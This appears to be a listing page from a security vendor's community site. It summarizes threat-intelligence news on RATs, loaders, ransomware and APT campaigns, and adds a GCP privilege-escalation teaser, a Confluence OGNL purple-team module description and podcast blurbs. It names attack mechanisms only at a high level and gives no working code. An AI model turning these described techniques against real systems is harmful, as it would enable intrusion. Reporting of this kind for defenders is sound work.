Breaking industry news, cyber security resources, trends and more.
Gallium APT GroupNews
Researchers from Palo Alto Networks defined the PingPull RAT as a "difficult-to-detect" backdoor that leverages the Internet Control Message Protocol (ICMP) for C2 communications.Experts also found PingPull variants that use HTTPS and TCP for C2 communications instead of ICMP.The cyberespionage group has started targeting financial institutions and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Unlike past attacks, the group started using the PingPull RAT.
US Cert Alert - Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon SystemsNews
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
PureCrypter: A Fully-Functional Loader Distributing Remote Access Trojans and Information StealersNews
PureCrypter is a fully-featured loader being widely soldThe malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google's Protocol Buffer message format.
CERT-IL Alert: an active phishing campaign in Israel leads to malwareNews
Recently new information was passed to the CERT-IL team indicating that there is an active phishing campaign against various users in Israel.The phishing campaign starts with a malicious email sent from "Israel Post" which contains a malicious attachment that leads to malware installation on the computer.
Google-sudoers Privilege Escalation
In this series of articles, we will discuss a variety of MITRE ATT&CK techniques for Google Cloud Platform (GCP). The articles will cover techniques such as persistence, privilege escalation, lateral movement, and more. The first technique we will discuss is privilege escalation in GCP through a process called "google-guest-agent". Google Compute Engine Services Google Compute Engine (GCE) has some services that are run by the systemd daemon, including "google-guest-agent.service". This service is responsible for executing the binary "google-guest-agent" at boot. As we can see the agent is child of the init process and is running as root. What is google-guest-agent?‘Google-guest-agent’ is a daemon that is responsible for handling GCE platform features. The guest agent functionality can be separated into various areas of responsibility. Historically, on Linux these were managed by separate independent processes, but today they are all managed by the guest agent.The guest agent handl
Msiexec Impersonation - Exploit Leads to Data ExfiltrationNews
In this multi-day intrusion, The DFIR Report observed a threat actor gain initial access to an organization by exploiting a vulnerability in ManageEngine SupportCenter Plus.The threat actor, discovered files on the server and dumped credentials using a web shell, moved laterally to key servers using Plink and RDP and exfiltrated sensitive information using the web shell and RDP.The FBI and CISA published an advisory noting that APT attackers were using CVE-2021-44077 to gain initial access to the networks of organizations of Critical Infrastructure Sectors such as healthcare, financial, electronics and IT consulting industries.
Confluence Pre-Auth RCE
On June 02, 2022, Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity of unauthenticated remote code execution vulnerability.The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance and is currently being exploited by a specific threat actor. in order to bring value to our customers and help them test and verify their systems are secure against it our research team rushed to release a purple team module for that specific reason.You can find it under the following name: Confluence Pre-Auth Remote Code Execution via OGNL Injection(CVE-2022-26134)The execution expects two input arguments:Hostname : the vulnerable host to checkCommand : the command we would like to run if the host is found to be vulnerable (defaults to whoami which will print the current running username.)
3 Quick Wins for Risk Mitigation on Each Attack Vector
It is crucial to protect yourself from cyber-attacks that can compromise your security posture and cause damage to your organization. With proper configurations and implementations, you can help prevent these cyber-attacks from impacting your organization. For each attack vector, we have compiled the top 3 recommendations for risk mitigation. Email Gateway Block unnecessary attachment file types – allow the minimum that is required for operating your organization. Enable aggressive anti-malware scanning such as advanced AV, Sandbox, or CDR. Enable URL scanning, sandboxing, and rewriting – in email body and attachments. Web Gateway Block downloads or allow the minimum required list of file types that is required for operating your organization. Block browsing categories that are not required for operating your organization. Focus on questionable categories such as “Newly Registered Domains,” “Parked Domains,” and “Uncategorized.” Implement browsing isolation to ensure th
Follina - a Microsoft Office code execution zero day, now exploited in the wildNews
Nao_sec identified an odd looking Word document in the wild, uploaded from an IP address in Belarus.This turned out to be a zero day vulnerability in Office and/or Windows.Defender for Endpoint missed execution.The document uses the Word remote template feature to retrieve a HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell.
QR codes on Twitter deliver malicious Chrome extensionNews
ISO file downloads are advertised via QR codes on Twitter and on supposedly free gaming sites, but they don't contain what they promise.QR codes on Twitter and malvertisingThe loader for the malicious Chrome extension was initially analysed by @x3ph1 who dubbed it ChromeLoader.To avoid misunderstandings with legitimate Chrome components we hereby refer to it as Choziosi loader.The analysis on the loader is detailed but x3ph1 does not describe the Chrome extension Choziosi.Twitter user @th3_protoCOL found QR codes that circulate on Twitter and advertise pirated software to lure people into downloading an ISO.Reddit users also complain about malicious ISO files on websites that provide Steam games.This tweet by @StopMalvertisin says the ISOs are downloaded via malicious advertisements.hxxps://www.gdatasoftware.com/fileadmin/web/general/images/blog/2022/01/chromeloader_twitter2.pnghxxps://www.gdatasoftware.com/fileadmin/_processed_/7/1/chromeloader_reddit_c4998c051d.png
New Chaos Ransomware Builder Variant "Yashma" Discovered in the WildNews
Cybersecurity researchers have disclosed details of the latest version of the Chaos ransomware line, dubbed Yashma.While it's purportedly a .NET version of Ryuk, closer examination of the sample reveals that it doesn't share much with the notorious ransomware. In fact, early versions of Chaos, which is now in its fourth iteration, were more akin to a destructive trojan than to traditional ransomware. Yashma version adds some new capabilities.
Twisted Panda: Chinese APT espionage operation against RussiaNews
Check Point Research (CPR) details a targeted campaign that has been using sanctions-related baits to attack Russian defense institutes, part of the Rostec Corporation.The investigation shows that this campaign is part of a larger Chinese espionage operation that has been ongoing against Russian-related entities for several months.CPR researchers estimate with high confidence that the campaign has been carried out by an experienced and sophisticated Chinese nation-state APT.
Malicious Compiled HTML Help File Delivering Agent TeslaNews
PaloAlto Unit42 discovered a malicious HTML help file delivering Agent Tesla.The attack is interesting because attackers are often looking for creative ways to deliver their payloads.Their purpose in doing so is twofold:An attempt to bypass security products.An attempt to bypass security training.Potential victims may have been trained to avoid documents, scripts and executables from unknown senders, but it is important to be careful of almost any filetype.Agent Tesla is well-known malware that has been around for a while.Agent Tesla focuses on stealing sensitive information from a victim's computer and sending that information to the attacker over FTP, SMTP or HTTP.It does this primarily via keystroke logging, screen capturing, camera recording and accessing sensitive data.
Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K.News
A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K.Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign.
The Lotus Panda is awake, againNews
In this attack analyzed by C25, the Chinese APT used a spear phishing email to deliver a beacon of a Red Team framework known as "Viper".The kill chain includes an artifact that is already known and that was attributed to Naikon one year ago and it is used to load and execute a custom shellcode.The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country.
Leverage Cymulate Exposure Management and Security Control Validation to Support All MITRE 11 Strategies for a World-Class SOCBlog
MITRE just published the 11 Strategies for a World-Class Cybersecurity Operations Center book. A recurring theme in this book is the importance of Cyber Threat Intelligence (CTI) as instrumental to “augment the SOC’s ability to identify adversaries and discern their movements from those of authorized users.” The document further states that CTI “moves the SOC from a per-incident approach to an adversary-focused paradigm.”As Cymulate for Exposure Management and Security Control Validation is designed to provide extensive in-context CTI capabilities and, as such, supports each one of these tactics as briefly broached below.MITRE Strategy 1 - Know what you are protecting and why:Exposure Management and Security Control Validation provides a continuously updated situational awareness of the security posture of individual attack vectors, including iteratively observing, orienting, deciding, and acting through:the creation and continuous updater of a composite inventory of all exposed assets
🎙 Executive Understanding of Cyber Risk and Risk Reduction with Magda Chelly
As a business executive, understanding how cyber risks can lead to financial losses and more importantly how to reduce risk to an acceptable level is critical. Today we are going to discuss:· How Cybersecurity risk is real risk?· How everyone is a target?· How business driving risk reduction is key for success of cybersecurity programs.· As an executive to know what questions to ask, what to measure and how to mitigate these risks.· A non-technical understanding of how Extended Security Posture Management with offensive testing is used to 1. visualize, explain, and reduce risk. 2. Ensures optimized value for your cybersecurity spend.Dr. Magda Chelly is an award-winning global cybersecurity leader. IFSEC Global has listed her as one of the top 20 most influential cybersecurity personalities globally. After years of experience as Information Security Officer in several multinational organizations, she co-founded a cybersecurity start-up.
🎙 Essential Application & Web Cybersecurity with Tanya Janca
Never have applications, most web based, been more critical for success of every business. Yet when looking at enterprises' ability to shore up security here, it has become the weakest link.In Verizon’s 2021 Data Breach Investigations Report, Web Applications were accounted for 89% of credential abuse and over 56% of asset compromises.
🎙 Demystifying Zero Trust with Chuck Brooks
Zero Trust has become the framework of choice to reduce risk and ensure optimized cybersecurity. Join Dave Klein, Director and Cyber Evangelist for Cymulate and his guest Chuck Brooks as they discuss. Join this talk to learn: - How to make Zero Trust truly actionable and continuous.- How to optimize risk reduction and outcomes.- The role of offensive testing and purple teaming in Zero Trust.
🎙 Essential Purple Teaming Management
Wednesday, February 9th, 2022 Guest: Tracy Z. Maleeff Target audience: Leadership and Technical To mitigate and reduce cybersecurity risks it is essential that everyone within an enterprise becomes involved. Purple teaming has become the natural evolution of goal-oriented cybersecurity risk management. Come join our podcast to learn: Problems with legacy methods Benefits of Purple Teaming and Offensive Testing Explaining the importance to management in terms they understand. How to maximize success and inclusion of other teams?
Leveraging the Pyramid of Pain and the Diamond Model to do great Threat Hunting Simulations
One of Cymulates greatest features is the Purple Team module. It allows users to create advanced attack scenarios for Threat Hunting scenarios using templates which are the chained sum of the plethora of executions created by Cymulate. Bundled with the Immediate Threat Module, one can create strong Threat Hunting scenarios.But how does one create good threat hunting scenarios and really challenge ones Blue Team and test their capabilities?The Pyramid of Pain Let’s look at the pyramid of pain from a great article written way back in 2014.Designed back in 2013, as a response to the APT 1 report written by Mandiant. It was created as a response to the discussion about the report – people were talking mostly about the host-based indicators and the network-based indicators detection instead of leveraging the information describing the TTPs reported within the report.In short –Hash values – the computed hash values for malware and tools dropped in a compromise, these can be added into
🚨 Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign Iranian🚨News
The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems. "The MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage, intellectual property theft, and deploy ransomware and destructive malware in an enterprise," Cisco Talos researchers Asheer Malhotra, Vitor Ventura, and Arnaud Zobec said in a report. The group, which has been active since at least 2017, is known for its attacks on various sectors that help further advance Iran's geopolitical and national security objectives.
This Week's Newscast: Cyberthreat - Current Conflict in UkraineNews
In this newscast we are going in-depth on the cyber threat the current conflict poses on the Ukraine 🇺🇦and abroad globally. Watch this newscast to learn:History of cyberattacks against the Ukraine Current DDoS and Wiper cyber weapons in use in today’s conflict. What global sanctions in effect against Russia? What are examples of Russia using it’s cyberweapons outside of Ukraine? What are the potential Russian targets globally? What additional offensive cyber options are open the US and its allies?
🚨 TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates🚨News
Proofpoint researchers have observed TA416, an actor assessed to be aligned with the Chinese state, utilizing web bugs to profile their targets. Commonly referred to as tracking pixels, web bugs embed a hyperlinked non-visible object within the body of an email that, when enabled, will attempt to retrieve a benign image file from an actor-controlled server. This provides a "sign of life" to threat actors and indicates that the targeted account is valid with the user being inclined to open emails that utilize social engineering content. TA416 has been using web bugs to target victims prior to delivering malicious URLs that have installed a variety of PlugX malware payloads. The operational tempo of these campaigns, specifically those against European governments, have increased sharply since Russian troops began amassing on the border of Ukraine. The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malwa
Already have an account? Login
LoginCUSTOMER / CYMULATE EMPLOYEE LOGIN
Login to the community
No account yet? Create an account
LoginCUSTOMER / CYMULATE EMPLOYEE LOGIN
Enter your username or e-mail address. We'll send you an e-mail with instructions to reset your password.